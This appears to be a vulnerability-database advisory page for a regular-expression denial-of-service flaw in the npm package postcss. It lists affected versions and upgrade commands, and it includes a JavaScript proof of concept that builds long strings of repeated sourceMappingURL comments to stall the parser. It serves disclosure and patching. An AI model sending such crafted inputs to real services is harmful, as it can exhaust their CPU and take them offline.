VDB
Sign up
MEDIUM5.3

GHSA-566m-qj78-rww5

Regular Expression Denial of Service in postcss

Quick fix

GHSA-566m-qj78-rww5 — postcss: upgrade to the fixed version with the command below.

npm install postcss@8.2.13

Details

The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern ```regex \/\*\s* sourceMappingURL=(.*) ```

### PoC ```js var postcss = require("postcss") function build_attack(n) { var ret = "a{}" for (var i = 0; i < n; i++) { ret += "/*# sourceMappingURL=" } return ret + "!"; } ``` ```js postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) { if (i % 1000 == 0) { var time = Date.now(); var attack_str = build_attack(i) try { postcss.parse(attack_str) var time_cost = Date.now() - time; console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms"); } catch (e) { var time_cost = Date.now() - time; console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms"); } } } ```

Are you affected?

Enter the version of the package you're using.

Affected packages

npm/postcss
Introduced in: 8.0.0Fixed in: 8.2.13
Fixnpm install postcss@8.2.13
npm/postcss
Introduced in: 0Fixed in: 7.0.36
Fixnpm install postcss@7.0.36

References